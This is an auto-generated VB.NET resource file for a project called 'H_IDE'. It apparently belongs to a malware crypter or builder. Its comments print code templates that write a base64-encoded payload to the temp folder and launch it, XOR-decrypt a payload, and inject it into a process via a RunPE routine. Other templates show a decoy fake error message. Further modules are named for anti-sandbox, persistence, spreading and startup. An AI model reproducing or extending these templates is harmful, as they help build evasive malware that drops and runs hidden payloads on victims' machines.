'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.17929
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("H_IDE.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .
        '''</summary>
        Friend ReadOnly Property AntiSandboxModule() As String
            Get
                Return ResourceManager.GetString("AntiSandboxModule", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to If Not IO.File.Exists(IO.Path.GetTempPath &amp; &quot;%1%.txt&quot;) Then
        '''Dim %2% As String = %3% 
        '''IO.File.Delete(IO.Path.GetTempPath &amp; &quot;%4%&quot;)
        '''IO.File.WriteAllBytes(IO.Path.GetTempPath &amp; &quot;%4%&quot;, Convert.FromBase64String(%2%))
        '''Process.Start(IO.Path.GetTempPath &amp; &quot;%4%&quot;)
        '''IO.File.WriteAllText(IO.Path.GetTempPath &amp; &quot;%1%.txt&quot;, &quot;%5%&quot;)
        '''Else
        '''End if.
        '''</summary>
        Friend ReadOnly Property BinderModule() As String
            Get
                Return ResourceManager.GetString("BinderModule", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .
        '''</summary>
        Friend ReadOnly Property CriticalProcessModule() As String
            Get
                Return ResourceManager.GetString("CriticalProcessModule", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Function decrypt(ByVal message As Byte(), ByVal password As String) As Byte()
        '''Dim passarr As Byte() = System.Text.Encoding.Default.GetBytes(password)
        '''Dim rand1 As Integer = message(message.Length - 1) Xor 112
        '''Dim outarr(message.Length) As Byte
        '''Dim u1 As Integer
        '''For i1 As Integer = 0 To message.Length - 1
        '''outarr(i1) = (message(i1) Xor rand1) Xor passarr(u1)
        '''If u1 = password.Length - 1 Then u1 = 0 Else u1 = u1 + 1
        '''Next
        '''ReDim Preserve outarr(message.Length - 2)
        '''Return outarr
        '''End Function.
        '''</summary>
        Friend ReadOnly Property EncryptionModule() As String
            Get
                Return ResourceManager.GetString("EncryptionModule", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to End Sub.
        '''</summary>
        Friend ReadOnly Property EndSubBase() As String
            Get
                Return ResourceManager.GetString("EndSubBase", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to If Not IO.File.Exists(IO.Path.GetTempPath &amp; &quot;%1%.txt&quot;) Then
        '''MsgBox(&quot;%2%&quot;, MsgBoxStyle.Critical, &quot;%3%&quot;)
        '''IO.File.WriteAllText(IO.Path.GetTempPath &amp; &quot;%1%.txt&quot;, &quot;%4%&quot;)
        '''Else
        '''End If.
        '''</summary>
        Friend ReadOnly Property FakeErrorMessage() As String
            Get
                Return ResourceManager.GetString("FakeErrorMessage", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to IO.File.Delete(IO.Path.GetTempPath &amp; &quot;%1%&quot;)
        '''IO.File.Copy(&quot;%2%&quot;, IO.Path.GetTempPath &amp; &quot;%1%&quot;)
        '''Dim %3% As String = %4%
        '''Dim %5% as Byte() = decrypt(Convert.FromBase64String(%3%),&quot;%6%&quot;)
        '''Run(IO.Path.GetTempPath &amp; &quot;%1%&quot;, &quot;&quot;, %5%, False).
        '''</summary>
        Friend ReadOnly Property InjectionModule() As String
            Get
                Return ResourceManager.GetString("InjectionModule", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Imports System
        '''Imports Microsoft.VisualBasic
        '''Imports System.Runtime.InteropServices
        '''Imports System.Threading
        '''Imports System.Reflection
        '''Imports System.Text
        '''Imports System.Security
        '''Imports System.Diagnostics
        '''Module %1%
        '''Sub Main().
        '''</summary>
        Friend ReadOnly Property ModuleBase() As String
            Get
                Return ResourceManager.GetString("ModuleBase", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to End Module.
        '''</summary>
        Friend ReadOnly Property ModuleEnd() As String
            Get
                Return ResourceManager.GetString("ModuleEnd", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .
        '''</summary>
        Friend ReadOnly Property ProcessPersistanceModule() As String
            Get
                Return ResourceManager.GetString("ProcessPersistanceModule", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to     &lt;DllImport(&quot;kernel32.dll&quot;, EntryPoint:=&quot;CreateProcess&quot;, CharSet:=CharSet.Unicode), SuppressUnmanagedCodeSecurity()&gt; _
        '''    Private Function CreateProcess( _
        '''    ByVal applicationName As String, _
        '''    ByVal commandLine As String, _
        '''    ByVal processAttributes As IntPtr, _
        '''    ByVal threadAttributes As IntPtr, _
        '''    ByVal inheritHandles As Boolean, _
        '''    ByVal creationFlags As UInteger, _
        '''    ByVal environment As IntPtr, _
        '''    ByVal currentDirectory As String, _
        '''    ByRef startupInfo As STARTUP_I [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property RunPeModule() As String
            Get
                Return ResourceManager.GetString("RunPeModule", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .
        '''</summary>
        Friend ReadOnly Property SpreadModule() As String
            Get
                Return ResourceManager.GetString("SpreadModule", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .
        '''</summary>
        Friend ReadOnly Property StartupModule() As String
            Get
                Return ResourceManager.GetString("StartupModule", resourceCulture)
            End Get
        End Property
    End Module
End Namespace
